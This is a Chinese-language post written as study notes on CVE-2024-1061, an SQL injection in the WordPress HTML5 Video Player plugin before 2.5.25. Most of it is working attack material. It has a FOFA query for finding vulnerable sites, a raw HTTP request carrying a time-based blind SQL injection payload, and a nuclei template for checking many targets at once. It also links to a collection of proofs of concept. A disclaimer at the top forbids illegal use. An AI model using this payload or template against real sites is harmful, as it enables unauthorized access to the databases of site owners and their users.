免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

WordPress HTML5 Video Player SQL注入漏洞(CVE-2024-1061)

fofa语句

"wordpress" && body="html5-video-player"

漏洞复现

影响

WordPress Plugin HTML5 Video Player < 2.5.25

构造payload

1708313313884.png

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+ HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0;
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

nuclei批量验证

1708313351784.png

id: WordPress-HTML5-SQLi

info:
  name: WordPress HTML5 Video Player SQL注入漏洞(CVE-2024-1061)
  author: changge
  severity: high
  description: WordPress HTML5 Video Player存在SQL注入漏洞,攻击者可通过构造恶意请求执行SQL注入攻击。
  metadata:
    fofa-query: '"wordpress" && body="html5-video-player"'

requests:
  - raw:
      - |
        GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
        Connection: close
        Accept: */*
        Accept-Language: en
        Accept-Encoding: gzip

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'

github poc总汇地址:https://github.com/AYcg/poc